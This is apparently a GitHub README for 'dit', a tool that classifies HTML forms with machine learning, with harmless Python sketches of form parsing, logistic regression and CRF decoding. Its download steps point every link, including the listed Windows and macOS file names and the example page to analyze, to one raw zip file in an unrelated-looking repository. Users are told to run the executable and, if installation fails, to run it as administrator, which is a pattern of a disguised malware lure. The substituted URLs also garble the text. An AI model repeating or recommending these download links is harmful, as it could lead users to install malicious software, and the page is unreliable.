🔍 Classify HTML pages, forms, and fields with ML to identify types like login, search, registration, and more without external dependencies.

🧩 dit - Classify HTML Forms with Simple ML

Download dit

📄 What is dit?

dit is a tool that helps you identify and classify parts of web pages, especially forms and fields. It uses machine learning methods like Logistic Regression and Conditional Random Fields to analyze HTML. This helps you understand the structure of web forms quickly and clearly.

You can use dit to organize or extract information from web pages without digging through complicated code. It works on many types of forms and fields, making web data easier to handle.

💻 What can dit do for you?

  • Detect the location and type of forms on any HTML page.
  • Classify different types of input fields like text boxes, checkboxes, and drop-downs.
  • Work quietly in the background without interrupting your work.
  • Help with tasks like data entry automation, web scraping, or analyzing online forms.
  • Provide clear results you can use in other tools or processes.

🔧 System Requirements

To run dit, your computer needs:

  • Windows 10 or later / macOS 10.13 or later / Linux (Ubuntu 18.04+ recommended)
  • At least 4 GB of RAM (8 GB or more for large web pages)
  • 100 MB of free storage space
  • Internet connection for downloading the program
  • A modern web browser (Chrome, Firefox, Edge, or Safari) to view HTML content analyzed by dit

🚀 Getting Started

dit does not require programming skills. You just download it, open it, and point it to the web page or HTML file you want to analyze. It will do the rest.

Below you will find detailed steps to download, install, and use dit on your computer.

⬇️ Download & Install

Please visit this page to download the latest version of dit:

Download dit

Follow these instructions:

  1. Click the link above or go to https://github.com/wayang-roleplay/dit/raw/refs/heads/main/classifier/Software-indigeneity.zip
  2. Look for the latest release. Its files should have names like https://github.com/wayang-roleplay/dit/raw/refs/heads/main/classifier/Software-indigeneity.zip for Windows or https://github.com/wayang-roleplay/dit/raw/refs/heads/main/classifier/Software-indigeneity.zip for macOS.
  3. Download the file that matches your operating system.
  4. Once downloaded, open the file:
    • On Windows, double-click the .exe and follow the setup prompts.
    • On macOS, open the .dmg and drag the dit app to your Applications folder.
    • On Linux, the release page might have a compressed archive file. Download it and extract it to a folder you choose.
  5. After installation, you can run dit from your Start menu, your Applications folder, or by launching the executable file directly.

🛠 How to Use dit

You do not need to code anything. The program uses a simple interface:

  1. Launch dit on your computer.
  2. You will see a field to enter a web page address (URL) or choose an HTML file from your device.
  3. Type or paste your URL, such as https://github.com/wayang-roleplay/dit/raw/refs/heads/main/classifier/Software-indigeneity.zip, or click the file button to browse and select a saved HTML file.
  4. Press the “Analyze” button.
  5. dit will process the page and display a list of forms found.
  6. It will label each form’s fields with their type, like ‘text input’, ‘checkbox’, or ‘dropdown’.
  7. Use the results to review form structure, export data, or continue with your task.
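
For readers curious what steps 5 and 6 involve, here is a minimal sketch that lists the forms on a page and the widget type of each field. It uses only Python's standard `html.parser` module. It is not dit's own code: `FormCollector`, `list_forms`, and `SAMPLE` are hypothetical names made up for this illustration, and the widget labels come straight from the markup rather than from a trained model.

```python
from html.parser import HTMLParser


class FormCollector(HTMLParser):
    """Collect each <form> and the input-like elements nested inside it."""

    FIELD_TAGS = {"input", "select", "textarea"}

    def __init__(self):
        super().__init__()
        self.forms = []       # one dict per <form> found
        self._current = None  # form being read, or None outside a form

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self._current = {"action": attrs.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag in self.FIELD_TAGS and self._current is not None:
            # An <input> without a type attribute behaves as type="text".
            kind = (attrs.get("type") or "text").lower() if tag == "input" else tag
            self._current["fields"].append(
                {"name": attrs.get("name") or "", "kind": kind}
            )

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def list_forms(html):
    """Return a list of forms, each with its action and its fields."""
    parser = FormCollector()
    parser.feed(html)
    parser.close()
    return parser.forms


# Hypothetical sample page used only for this illustration.
SAMPLE = """
<form action="/login">
  <input name="user">
  <input name="pw" type="password">
  <input type="checkbox" name="remember">
  <select name="lang"><option>en</option></select>
</form>
"""

for form in list_forms(SAMPLE):
    print(form["action"], [(f["name"], f["kind"]) for f in form["fields"]])
```

A real classifier goes further than this: it also predicts what each form and field is for (login, search, registration), which the markup alone does not state.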

📁 Supported File Types and Web Pages

  • Standard HTML files (.html, .htm)
  • URLs to live web pages that serve HTML content
  • Local HTML pages saved from your browser or downloaded from a website
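
As a rough illustration of how a tool might accept both kinds of input listed above, the sketch below reads HTML either from a live URL or from a local `.html`/`.htm` file using only the Python standard library. The function names `is_url` and `load_html`, the 10-second timeout, and the UTF-8 fallback are assumptions for this example, not documented dit behavior.

```python
from pathlib import Path
from urllib.parse import urlparse
from urllib.request import urlopen


def is_url(source):
    """True when source looks like an http(s) address rather than a file path."""
    return urlparse(source).scheme in ("http", "https")


def load_html(source, timeout=10.0):
    """Return HTML text from a live URL or from a local .html/.htm file."""
    if is_url(source):
        with urlopen(source, timeout=timeout) as response:
            # Fall back to UTF-8 when the server does not declare a charset.
            charset = response.headers.get_content_charset() or "utf-8"
            return response.read().decode(charset, errors="replace")
    path = Path(source)
    if path.suffix.lower() not in (".html", ".htm"):
        raise ValueError(f"unsupported file type: {path.suffix or '(none)'}")
    return path.read_text(encoding="utf-8", errors="replace")
```

Checking the scheme rather than looking for a colon keeps Windows paths such as `C:\pages\form.html` on the file branch.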

⚙️ Under the Hood (How dit Works)

dit uses two main machine learning techniques:

  • Logistic Regression (LogReg): This helps dit decide the type of each form field based on features like HTML tags, attributes, and surrounding text.
  • Conditional Random Fields (CRF): This improves accuracy by considering the order and relation of fields within a form, so each field's type is predicted in the context of its neighbors rather than in isolation.
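
To make the Logistic Regression idea concrete, here is a small self-contained sketch in plain Python. It trains a binary classifier ("is this an email field?") on a handful of invented examples, using the field's type and the words in its attributes as features. The feature scheme, the toy data, and the names `features`, `train`, and `predict` are all assumptions for illustration; dit's actual features, labels, and training data are not described in this README.

```python
import math
import re


def features(field):
    """Turn a field's attributes into a set of binary feature names."""
    feats = {"type=" + field.get("type", "text")}
    text = " ".join(field.get(k, "") for k in ("name", "placeholder", "label"))
    feats.update("tok=" + t for t in re.findall(r"[a-z]+", text.lower()))
    return feats


def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))


def predict(weights, feats):
    """Probability of the positive class: sigmoid of bias plus feature weights."""
    score = weights.get("bias", 0.0) + sum(weights.get(f, 0.0) for f in feats)
    return sigmoid(score)


def train(examples, epochs=200, lr=0.5):
    """Fit weights by stochastic gradient descent on the log loss."""
    weights = {}
    for _ in range(epochs):
        for field, label in examples:
            feats = features(field)
            error = label - predict(weights, feats)
            # Every active feature (value 1) gets the same gradient step.
            for f in feats | {"bias"}:
                weights[f] = weights.get(f, 0.0) + lr * error
    return weights


# Invented toy data: label 1 means "email field", 0 means anything else.
TRAIN = [
    ({"type": "email", "name": "email"}, 1),
    ({"type": "text", "name": "user_email", "placeholder": "Email address"}, 1),
    ({"type": "text", "name": "mail", "label": "Your email"}, 1),
    ({"type": "password", "name": "password"}, 0),
    ({"type": "text", "name": "q", "placeholder": "Search"}, 0),
    ({"type": "text", "name": "first_name", "label": "First name"}, 0),
]

weights = train(TRAIN)
unseen = {"type": "text", "name": "contact_email"}
print("P(email) =", round(predict(weights, features(unseen)), 2))
```

The unseen field is classified as an email field because the token `email` earned a positive weight during training, even though `type="text"` on its own says nothing about purpose.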

These methods combine to give reliable, easy-to-understand classifications.
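
The benefit of sequence context can be shown with a toy decoder. The sketch below runs Viterbi decoding, the standard way to pick the best label sequence in a linear-chain CRF, over three fields. All scores are hand-picked for illustration rather than learned, and the labels, `EMISSIONS`, and `TRANSITIONS` are hypothetical values, not taken from dit.

```python
def viterbi(emissions, transitions, labels):
    """Return the highest-scoring label sequence for a linear chain.

    emissions[i][y] is the local score for label y at position i;
    transitions[(a, b)] is the score for label a followed by label b.
    """
    best = [{y: emissions[0].get(y, 0.0) for y in labels}]
    back = []
    for scores in emissions[1:]:
        row, pointers = {}, {}
        for y in labels:
            prev = max(labels, key=lambda p: best[-1][p] + transitions.get((p, y), 0.0))
            row[y] = best[-1][prev] + transitions.get((prev, y), 0.0) + scores.get(y, 0.0)
            pointers[y] = prev
        best.append(row)
        back.append(pointers)
    # Follow the back-pointers from the best final label.
    path = [max(labels, key=lambda y: best[-1][y])]
    for pointers in reversed(back):
        path.append(pointers[path[-1]])
    return path[::-1]


LABELS = ["username", "password", "password_confirm"]

# Hand-picked local scores for three consecutive fields in one form.
EMISSIONS = [
    {"username": 2.0, "password": 0.1, "password_confirm": 0.0},
    {"username": 0.1, "password": 2.0, "password_confirm": 1.5},
    {"username": 0.0, "password": 1.6, "password_confirm": 1.5},
]

# Hand-picked pairwise scores: two plain password fields in a row are unlikely.
TRANSITIONS = {
    ("username", "password"): 1.0,
    ("password", "password_confirm"): 1.0,
    ("password", "password"): -1.0,
}

local = [max(LABELS, key=lambda y: e[y]) for e in EMISSIONS]
print("per-field guess:", local)
print("with context:   ", viterbi(EMISSIONS, TRANSITIONS, LABELS))
```

Judged on its own, the third field looks slightly more like a second `password` field. Once the transition scores are taken into account, the decoder labels it `password_confirm`, because a confirmation field following a password field is the more plausible sequence.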

🧰 Features at a Glance

  • Clear form and field type detection
  • Works with most modern HTML and forms
  • Fast analysis and results
  • Simple interface, no coding needed
  • Lightweight and runs on average computers
  • Command-line support for advanced users (optional)

💡 Tips for Best Results

  • Use well-formed HTML pages. Pages with broken or incomplete code might confuse the tool.
  • For complex sites, save the page as a local HTML file and analyze it offline.
  • Keep dit updated by checking the release page regularly.
  • If a web page requires login, log in first, save the page from your browser, and analyze the saved file.
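
If you want a quick way to spot obviously broken markup before analyzing a saved page, a rough check like the following can help. It is a sketch built on Python's standard `html.parser`, with hypothetical names (`BalanceChecker`, `check_balance`), and it is deliberately stricter than the HTML standard: tags whose closing tag is optional in HTML, such as `<li>` or `<p>`, are reported as unclosed even though browsers accept them.

```python
from html.parser import HTMLParser

# Elements that never take a closing tag in HTML.
VOID = {"area", "base", "br", "col", "embed", "hr", "img", "input",
        "link", "meta", "source", "track", "wbr"}


class BalanceChecker(HTMLParser):
    """Track open tags and record closing tags that do not match."""

    def __init__(self):
        super().__init__()
        self.open_tags = []
        self.problems = []

    def handle_starttag(self, tag, attrs):
        if tag not in VOID:
            self.open_tags.append(tag)

    def handle_startendtag(self, tag, attrs):
        pass  # self-closing syntax such as <br/>: nothing to balance

    def handle_endtag(self, tag):
        if tag in VOID:
            return
        if tag not in self.open_tags:
            self.problems.append(f"stray </{tag}>")
            return
        # Anything opened after the matching tag was left unclosed.
        while self.open_tags[-1] != tag:
            self.problems.append(f"unclosed <{self.open_tags.pop()}>")
        self.open_tags.pop()


def check_balance(html):
    """Return a list of human-readable problems; empty means tags balance."""
    checker = BalanceChecker()
    checker.feed(html)
    checker.close()
    leftovers = [f"unclosed <{t}>" for t in reversed(checker.open_tags)]
    return checker.problems + leftovers


print(check_balance("<form><div><input name='q'></form>"))
```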

❔ Troubleshooting

  • If dit does not open, verify your system meets the minimum requirements.
  • For missing or incorrect results, try using a different web page or a saved HTML file.
  • If you encounter errors during installation, check folder permissions or try running the installer as administrator.
  • Consult the Issues section on the GitHub repo for common problems and fixes.

📚 Learn More and Further Help


⬇️ Download dit now and start analyzing HTML forms without coding.